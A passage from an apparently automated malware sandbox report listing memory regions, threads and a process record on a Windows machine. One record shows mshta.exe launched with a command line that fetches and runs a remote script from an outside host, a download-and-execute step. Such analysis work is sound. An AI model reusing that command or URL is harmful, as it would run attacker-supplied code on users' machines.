end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1104
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1105
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1106
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1107
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1108
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1109
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1110
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1111
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1112
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1113
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1114
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1115
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1116
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1117
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1118
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1119
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Thread:
id = 48
os_tid = 0xad4
Thread:
id = 49
os_tid = 0x49c
Thread:
id = 50
os_tid = 0x590
Thread:
id = 51
os_tid = 0x494
Thread:
id = 52
os_tid = 0x48c
Thread:
id = 53
os_tid = 0x338
Thread:
id = 54
os_tid = 0x7dc
Thread:
id = 55
os_tid = 0x7cc
Thread:
id = 56
os_tid = 0x7a8
Thread:
id = 57
os_tid = 0x798
Thread:
id = 58
os_tid = 0x5b4
Thread:
id = 59
os_tid = 0xf4
Thread:
id = 60
os_tid = 0xcc
Thread:
id = 61
os_tid = 0x3f8
Thread:
id = 62
os_tid = 0x3f4
Thread:
id = 63
os_tid = 0x3f0
Thread:
id = 64
os_tid = 0x3e0
Thread:
id = 162
os_tid = 0x734
Process:
id = "7"
image_name = "mshta.exe"
filename = "c:\\windows\\system32\\mshta.exe"
page_root = "0x3abee000"
os_pid = "0x370"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x9b0"
cmd_line = "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1179
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1180
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1181
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1182
start_va = 0x110000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1183
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1184
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1185
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1186
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d2c24
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 1187
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1188
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1189
start_va = 0x7fffffd6000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 1190
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1191
start_va = 0x240000
end_va = 0x33ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 1192
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1193
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1194
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1195
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1196
start_va = 0x400000
end_va = 0x40ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1197
start_va = 0x410000
end_va = 0x50ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1198
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1199
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1200
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1201
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1202
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1203
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1204
start_va = 0x6c0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 1205
start_va = 0x510000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 1206
start_va = 0x7fee0880000
end_va = 0x7fee1117fff
entry_point = 0x7fee08854c0
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 1207
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1208
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1209
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1210
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1211
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1212
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1213
start_va = 0x7fefe3d0000
end_va = 0x7fefe547fff
entry_point = 0x7fefe3d10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 1214
start_va = 0x7feff5e0000
end_va = 0x7feff709fff
entry_point = 0x7feff5e10d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 1215
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1216
start_va = 0x7fefdf60000
end_va = 0x7fefe1b8fff
entry_point = 0x7fefdf61340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1217
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1218
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1219
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1220
start_va = 0x7fef6080000
end_va = 0x7fef60bafff
entry_point = 0x7fef6081070
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 1221
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1226
start_va = 0xc0000
end_va = 0xe8fff
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1227
start_va = 0x6d0000
end_va = 0x857fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 1228
start_va = 0xc0000
end_va = 0xe8fff
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1229
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1230
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1231
start_va = 0x860000
end_va = 0x9e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000860000"
filename = ""
Region:
id = 1232
start_va = 0x9f0000
end_va = 0x1deffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009f0000"
filename = ""
Region:
id = 1233
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1234
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1235
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0xd0000
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui")
Region:
id = 1236
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1237
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1238
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1240
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1241
start_va = 0x1f70000
end_va = 0x206ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 1242
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1243
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1244
start_va = 0x340000
end_va = 0x3bcfff
entry_point = 0x34cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1245
start_va = 0x340000
end_va = 0x3bcfff
entry_point = 0x34cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1246
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1247
start_va = 0x2070000
end_va = 0x226ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002070000"
filename = ""
Region:
id = 1252
start_va = 0x1df0000
end_va = 0x1ecefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001df0000"
filename = ""
Region:
id = 1253
start_va = 0x7fefb180000
end_va = 0x7fefb197fff
entry_point = 0x7fefb181130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1254
start_va = 0x2270000
end_va = 0x253efff
entry_point = 0x2270000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1255
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1256
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1257
start_va = 0x2540000
end_va = 0x2882fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002540000"
filename = ""
Region:
id = 1258
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1259
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1260
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 1261
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1262
start_va = 0x230000
end_va = 0x23bfff
entry_point = 0x230000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1263
start_va = 0x340000
end_va = 0x347fff
entry_point = 0x340000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1264
start_va = 0x350000
end_va = 0x35ffff
entry_point = 0x350000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1265
start_va = 0x360000
end_va = 0x39ffff
entry_point = 0x360000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 1266
start_va = 0x3a0000
end_va = 0x3a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 1281
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1282
start_va = 0x3b0000
end_va = 0x3b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 1283
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x3c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1284
start_va = 0x3d0000
end_va = 0x3d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1285
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1286
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x3c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1287
start_va = 0x3e0000
end_va = 0x3e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 1288
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1289
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 1290
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1291
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1292
start_va = 0x2890000
end_va = 0x2a7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 1293
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1294
start_va = 0x2a80000
end_va = 0x2cbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a80000"
filename = ""
Region:
id = 1295
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1296
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1297
start_va = 0x28a0000
end_va = 0x299ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 1298
start_va = 0x2a00000
end_va = 0x2a7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 1299
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1300
start_va = 0x7fef3180000
end_va = 0x7fef31e1fff
entry_point = 0x7fef3181198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1301
start_va = 0x7fef3160000
end_va = 0x7fef317bfff
entry_point = 0x7fef31611a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1302
start_va = 0x7fefadc0000
end_va = 0x7fefadd0fff
entry_point = 0x7fefadc14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1327
start_va = 0x2090000
end_va = 0x218ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002090000"
filename = ""
Region:
id = 1328
start_va = 0x21f0000
end_va = 0x226ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 1329
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 1330
start_va = 0x610000
end_va = 0x610fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 1331
start_va = 0x610000
end_va = 0x610fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 1332
start_va = 0x7fef6630000
end_va = 0x7fef6638fff
entry_point = 0x7fef66314b4
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 1333
start_va = 0x2db0000
end_va = 0x2eaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 1334
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 1335
start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf760d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1336
start_va = 0x2a80000
end_va = 0x2beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a80000"
filename = ""
Region:
id = 1337
start_va = 0x2c40000
end_va = 0x2cbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c40000"
filename = ""
Region:
id = 1338
start_va = 0x2eb0000
end_va = 0x307ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002eb0000"
filename = ""
Region:
id = 1339
start_va = 0x620000
end_va = 0x6bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1343
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d1414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1344
start_va = 0x2f60000
end_va = 0x305ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f60000"
filename = ""
Region:
id = 1345
start_va = 0x3070000
end_va = 0x307ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003070000"
filename = ""
Region:
id = 1346
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1347
start_va = 0x620000
end_va = 0x65ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1348
start_va = 0x30f0000
end_va = 0x31effff
entry_point = 0x0
region_type = private
name = "private_0x00000000030f0000"
filename = ""
Region:
id = 1349
start_va = 0x779c0000
end_va = 0x779c2fff
entry_point = 0x779c0000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 1350
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef66666f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1351
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
